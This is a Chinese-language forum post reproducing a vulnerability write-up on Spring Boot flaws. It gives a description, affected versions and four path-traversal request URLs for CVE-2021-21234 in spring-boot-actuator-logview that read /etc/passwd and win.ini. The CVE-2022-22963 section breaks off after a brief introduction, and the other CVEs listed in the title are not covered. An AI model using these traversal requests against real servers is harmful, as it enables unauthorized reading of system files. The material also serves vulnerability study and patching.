Spring Boot 目录遍历--表达式注入--代码执行--(CVE-2021-21234)&&(CVE-202 ...

打印 上一主题 下一主题

主题 844|帖子 844|积分 2532

Spring Boot 目录遍历--表达式注入--代码执行--(CVE-2021-21234)&&(CVE-2022-22963)&&(CVE-2022-22947)&&(CVE-2022-2296)

Spring Boot 目录遍历 (CVE-2021-21234)

漏洞简介

spring-boot-actuator-logview 是一个简单的日志文件查看器作为Spring Boot执行器端点,在 0.2.13 版本之前存在着目录遍历漏洞,编号 CVE-2021-21234。漏洞本质是Spring Boot 执行器通过请求的参数来指定文件名和文件夹路径,经过组合拼接达到目录遍历,虽然源码中检查了文件名(filename)参数来防止目录遍历,但是没有检查文件夹(base)参数,造成了目录遍历
影响范围

spring-boot-actuator-logview < 0.2.13
漏洞复现

Windows:
http:///manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
http:///log/view?filename=/windows/win.ini&base=../../../../../../../../../../
Linux:
http:///manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../
http:///log/view?filename=/etc/passwd&base=../../../../../../../../../../
Spring Cloud Function Spel表达式注入(CVE-2022-22963)

漏洞简介

Spring Cloud Function提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像Amazon AWS Lambda这样的 FaaS(函数即服务,function as a service)平台。
影响范围


3.0.0.RELEASE
回复

使用道具 举报

0 个回复

正序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

八卦阵

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表